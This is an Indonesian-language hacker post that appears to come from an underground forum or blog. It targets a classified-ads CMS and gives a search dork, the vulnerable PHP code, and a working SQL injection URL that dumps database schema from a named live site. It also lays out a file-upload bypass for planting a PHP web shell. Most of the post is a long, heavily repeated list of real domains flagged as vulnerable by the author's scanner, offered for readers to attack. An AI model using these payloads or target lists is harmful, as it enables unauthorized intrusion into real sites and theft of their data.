Assalamu’alaikum wr.wb..
Alhamdulillah bisa aktif lagy di underground hehehe..
Kali ini kk minato ingin mengajak kawan” berpesta sedikit :v .. yuk kita langung aja..
##############SQL CMS IKLAN BARIS#####################
# Dork :: inurl:“kategori.php?premium=” atau di kembangin lagy aja.. ;)
Vulnerable found at kategori.php
$id = $_GET['id'];
$id_kategori = $_GET['kategori'];
$qryISI_kat = select_db("kategori_iklan","*","id_kategori = '$id_kategori'");
$recISI_kat = fetch_array($qryISI_kat);
$id_iklan_premium = $_GET['premium'];
$id_iklan_gratis = $_GET['gratis'];
$qryISI_premium = select_db("iklan_premium","*","id_iklan_premium = '$id_iklan_premium'");
$recISI_premium = fetch_array($qryISI_premium);
$qryISI_gratis = select_db("iklan_gratis","*","id_iklan_gratis = '$id_iklan_gratis'");
$recISI_gratis = fetch_array($qryISI_gratis);
Terlihat tdk ada filter disana.. XD
Demo:
vuln column di title,
http://iklanbitcoin.com/kategori.php?kategori=3'and 0 union select 1,2,concat(0x3c2f7469746c653e3c613e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)))-- -
#########arbitrary file upload CMS IKLAN BARIS ###################
File //iklan_gratis.php
$img = $_FILES['gambar']['type'];
$imgtype = strtolower($img);
/* if (($imgtype != "image/jpeg")&&($imgtype != "image/bmp")&&($imgtype != "image/gif")&&($imgtype != "image/x-png")){
alert('File gambar tidak dikenali!!!');
} */
NB::Filternya dibuang sama programmernya XD
Demo::
Pasang iklan gratis.. isi box terserah..
Lalu upload file dengan extensi,… shell.php.xxxjpg
Shell lokasi di http://iklanbitcoin.com/images/iklan_baris/shell.php.xxxjpg
Dibawah adalah target yg aku dapatin dr auto scanner ku.. selamat menikmati..lets rock (kita goyang) cms indoesia XD
1. bolamansion.com [NOT_FOUND]
2. afatogel.asia [NOT_FOUND]
3. afapoker.biz [NOT_FOUND]
4.
5. iklanbet.com [ketemu]
6. iklangroups.com [ketemu]
7. iklansexy.com [NOT_FOUND]
8. iklanpoker.com [ketemu]
9. iklanmurah.net [ketemu]
10. iklan365.com [ketemu]
11. iklanforex.net [ketemu]
12. iklanbitcoin.com [ketemu]
13. iklanword.com [ketemu]
14. iklanbet.com [ketemu]
15. iklangroups.com [ketemu]
16. iklansexy.com [NOT_FOUND]
17. iklanpoker.com [ketemu]
18. iklanmurah.net [ketemu]
19. iklan365.com [ketemu]
20. iklanforex.net [ketemu]
21. iklanbitcoin.com [ketemu]
22. iklanword.com [ketemu]
23. iklanbet.com [ketemu]
24. iklangroups.com [ketemu]
25. iklansexy.com [NOT_FOUND]
26. iklanpoker.com [ketemu]
27. klanmurah.net [NOT_FOUND]
28. iklan365.com [ketemu]
29. iklanforex.net [ketemu]
30. iklanbitcoin.com [ketemu]
31. iklanword.com [ketemu]
32. megaiklan.com [ketemu]
33. mejatangkas.com [ketemu]
34. mentaripoker.us [NOT_FOUND]
35. nagaunik.com [NOT_FOUND]
36. permataiklan.com [ketemu]
37. pokernaga.us [NOT_FOUND]
38. poker228.in [NOT_FOUND]
39. pokerv.net [NOT_FOUND]
40. poker228.info [NOT_FOUND]
41. poker228.asia [NOT_FOUND]
42. poker88plus.com [ketemu]
43. poker88.in [NOT_FOUND]
44. pokerwoles.biz [NOT_FOUND]
45. pokerol.net [NOT_FOUND]
46. samkokbet.info [NOT_FOUND]
47. samkokbet.net [NOT_FOUND]
48. speediklan.com [ketemu]
49. visaiklan.com [ketemu]
50. gamespools.asia [NOT_FOUND]
51. bagusiklan.com [ketemu]
52. serviceiklan.com [NOT_FOUND]
53. pusatpoker.com [NOT_FOUND]
54. mesiniklan.com [ketemu]
55. kucingbirahi.com [NOT_FOUND]
56. karyaiklan.com [ketemu]
57. infotangkas.com [ketemu]
58. iklanbet.com [ketemu]
59. iklangroups.com [ketemu]
60. iklansexy.com [NOT_FOUND]
61. iklanpoker.com [ketemu]
62. iklanmurah.net [ketemu]
63. iklan365.com [ketemu]
64. iklanforex.net [ketemu]
65. iklanbitcoin.com [ketemu]
66. iklanword.com [ketemu]
67. iklanbet.com [ketemu]
68. iklangroups.com [ketemu]
69. iklansexy.com [NOT_FOUND]
70. iklanpoker.com [ketemu]
71. iklanmurah.net [ketemu]
72. iklan365.com [ketemu]
73. iklanforex.net [ketemu]
74. iklanbitcoin.com [ketemu]
75. iklanword.com [ketemu]
76. iklanbet.com [ketemu]
77. iklangroups.com [ketemu]
78. iklansexy.com [NOT_FOUND]
79. iklanpoker.com [ketemu]
80. iklanmurah.net [ketemu]
81. iklan365.com [ketemu]
82. iklanforex.net [ketemu]
83. iklanbitcoin.com [ketemu]
84. iklanword.com [ketemu]
85. iklanbet.com [ketemu]
86. iklangroups.com [ketemu]
87. iklansexy.com [NOT_FOUND]
88. iklanpoker.com [ketemu]
89. iklanmurah.net [ketemu]
90. iklan365.com [ketemu]
91. iklanforex.net [ketemu]
92. iklanbitcoin.com [ketemu]
93. iklanword.com [ketemu]
94. grandiklan.com [ketemu]
95. gejora.com [ketemu]
96. dewarezeki.com [NOT_FOUND]
97. dewamabuk.net [NOT_FOUND]
98. bursajual.com [NOT_FOUND]
99. rimbapoker.us [NOT_FOUND]
100. rgopoker.us [NOT_FOUND]
101. seoiklan.com [ketemu]
102. mejajudi.com [NOT_FOUND]
103. fujiforex.com [ketemu]
104. bejopoker.info [NOT_FOUND]
105. bejopoker.us [NOT_FOUND]
106. bejopoker.info [NOT_FOUND]
107. bejopoker.us [NOT_FOUND]
108. daunpoker.us [ketemu]
109. dewacasino.in [ketemu]
110. dewacasino.asia [NOT_FOUND]
111. dominobet.cc [NOT_FOUND]
112. dominobet.us [NOT_FOUND]
113. dominobet.me [NOT_FOUND]
114. jasapoker.asia [NOT_FOUND]
115. jasapoker.us [ketemu]
116. juaraqq.us [ketemu]
117. juarapoker.us [NOT_FOUND]
118. indoqq.us [NOT_FOUND]
119. juaraqq.us [ketemu]
120. juarapoker.us [NOT_FOUND]
121. lapak303.asia [NOT_FOUND]
122. loginpoker88.com [NOT_FOUND]
123. nagapoker.biz [NOT_FOUND]
124. nagapoker.asia [NOT_FOUND]
125. nagapoker.biz [NOT_FOUND]
126. nagapoker.asia [NOT_FOUND]
127. pokernaga.us [NOT_FOUND]
128. poker228.in [NOT_FOUND]
129. pokerv.net [NOT_FOUND]
130. poker228.info [NOT_FOUND]
131. poker228.asia [NOT_FOUND]
132. poker88plus.com [ketemu]
133. poker88.in [NOT_FOUND]
134. pokerwoles.biz [NOT_FOUND]
135. pokerol.net [NOT_FOUND]
136. pokernaga.us [NOT_FOUND]
137. poker228.in [NOT_FOUND]
138. pokerv.net [NOT_FOUND]
139. poker228.info [NOT_FOUND]
140. poker228.asia [NOT_FOUND]
141. poker88plus.com [ketemu]
142. poker88.in [NOT_FOUND]
143. pokerwoles.biz [NOT_FOUND]
144. pokerol.net [NOT_FOUND]
145. pokernaga.us [NOT_FOUND]
146. poker228.in [NOT_FOUND]
147. pokerv.net [NOT_FOUND]
148. poker228.info [NOT_FOUND]
149. poker228.asia [NOT_FOUND]
150. poker88plus.com [ketemu]
151. poker88.in [NOT_FOUND]
152. pokerwoles.biz [NOT_FOUND]
153. pokerol.net [NOT_FOUND]
154. pokernaga.us [NOT_FOUND]
155. poker228.in [NOT_FOUND]
156. pokerv.net [NOT_FOUND]
157. poker228.info [NOT_FOUND]
158. poker228.asia [NOT_FOUND]
159. poker88plus.com [ketemu]
160. poker88.in [NOT_FOUND]
161. pokerwoles.biz [NOT_FOUND]
162. pokerol.net [NOT_FOUND]
163. pokernaga.us [NOT_FOUND]
164. poker228.in [NOT_FOUND]
165. pokerv.net [NOT_FOUND]
166. poker228.info [NOT_FOUND]
167. poker228.asia [NOT_FOUND]
168. poker88plus.com [ketemu]
169. poker88.in [NOT_FOUND]
170. pokerwoles.biz [NOT_FOUND]
171. pokerol.net [NOT_FOUND]
172. pokernaga.us [NOT_FOUND]
173. poker228.in [NOT_FOUND]
174. pokerv.net [NOT_FOUND]
175. poker228.info [NOT_FOUND]
176. poker228.asia [NOT_FOUND]
177. poker88plus.com [ketemu]
178. poker88.in [NOT_FOUND]
179. pokerwoles.biz [NOT_FOUND]
180. pokerol.net [NOT_FOUND]
181. rgobet.info [NOT_FOUND]
182. rgobet.net [NOT_FOUND]
183. rgobet.us [NOT_FOUND]
184. rgobet.info [NOT_FOUND]
185. rgobet.net [NOT_FOUND]
186. rgobet.us [NOT_FOUND]
187. rgobet.info [NOT_FOUND]
188. rgobet.net [NOT_FOUND]
189. rgobet.us [NOT_FOUND]
190. rgotogel.us [NOT_FOUND]
191. samkokbet.info [NOT_FOUND]
192. samkokbet.net [NOT_FOUND]
193. sayapoker.us [ketemu]
194. togelplus.info [NOT_FOUND]
195. togelplus.net [NOT_FOUND]
196. totojitu.net [NOT_FOUND]
197. totojitu.us [NOT_FOUND]
198. jasapoker.asia [NOT_FOUND]
199. jasapoker.us [ketemu]
200. beritapoker.com [ketemu]
201. idpools.net [ketemu]
202. arwanapoker.us [ketemu]
203. dewacasino.in [ketemu]
204. dewacasino.asia [NOT_FOUND]
205. dewabitcoin.com [NOT_FOUND]
206. dewabatu.com [NOT_FOUND]
207. juraganiklan.com [ketemu]
208. juraganlink.com [ketemu]
209. juraganiklan.com [ketemu]
210. juraganlink.com [ketemu]
211. dewabitcoin.com [NOT_FOUND]
212. dewabatu.com [NOT_FOUND]
213. iklanbet.com [ketemu]
214. iklangroups.com [ketemu]
215. iklansexy.com [NOT_FOUND]
216. iklanpoker.com [ketemu]
217. iklanmurah.net [ketemu]
218. iklan365.com [ketemu]
219. iklanforex.net [ketemu]
220. iklanbitcoin.com [ketemu]
221. iklanword.com [ketemu]
222. mabukpoker.com [NOT_FOUND]
223. iklanbet.com [ketemu]
224. iklangroups.com [ketemu]
225. iklansexy.com [NOT_FOUND]
226. iklanpoker.com [ketemu]
227. iklanmurah.net [ketemu]
228. iklan365.com [ketemu]
229. iklanforex.net [ketemu]
230. iklanbitcoin.com [ketemu]
231. iklanword.com [ketemu]
232. listingbetting.com [NOT_FOUND]
233. pok3r88.com [NOT_FOUND]
234. bisnisgelap.com [ketemu]
235. pokernaga.us [NOT_FOUND]
236. poker228.in [NOT_FOUND]
237. pokerv.net [NOT_FOUND]
238. poker228.info [NOT_FOUND]
239. poker228.asia [NOT_FOUND]
240. poker88plus.com [ketemu]
241. poker88.in [NOT_FOUND]
242. pokerwoles.biz [NOT_FOUND]
243. pokerol.net [NOT_FOUND]
244. bolatangkasplus.com [ketemu]
245. culturalexpertise.com [ketemu]
246. culturacervejeira.com [ketemu]
247. lucchesigalati.com [ketemu]
248. vangeel-ips.com [ketemu]
249. mojotheater.com [ketemu]
250. gmchealth.com [ketemu]
251. bizimaraba.com [NOT_FOUND]
252. dewasurga.com [ketemu]
253. cushingacademylibrary.com [NOT_FOUND]
254. cushingacademy.net [NOT_FOUND]
255. norcatcard.com [ketemu]
256. sourceurban.com [ketemu]
257. internationalpsychoanalysis.org [NOT_FOUND]
258. dawsonstrategic.com [ketemu]
259. iklanbet.com [ketemu]
260. iklangroups.com [ketemu]
261. iklansexy.com [NOT_FOUND]
262. iklanpoker.com [ketemu]
263. iklanmurah.net [ketemu]
264. iklan365.com [ketemu]
265. iklanforex.net [ketemu]
266. iklanbitcoin.com [ketemu]
267. iklanword.com [ketemu]
268. frederictontweets.com [ketemu]
269. bluebuffalohg.com [ketemu]
270. culturalexpertise.com [ketemu]
271. ulturacervejeira.com [NOT_FOUND]
272. diurnalize.com [ketemu]
273. alexavegas.net [ketemu]
tunggu update selanjutnya yh... bnyk rahasia yg akan kita kaji ^_^
salam dr keluarga Sec7or
0 komentar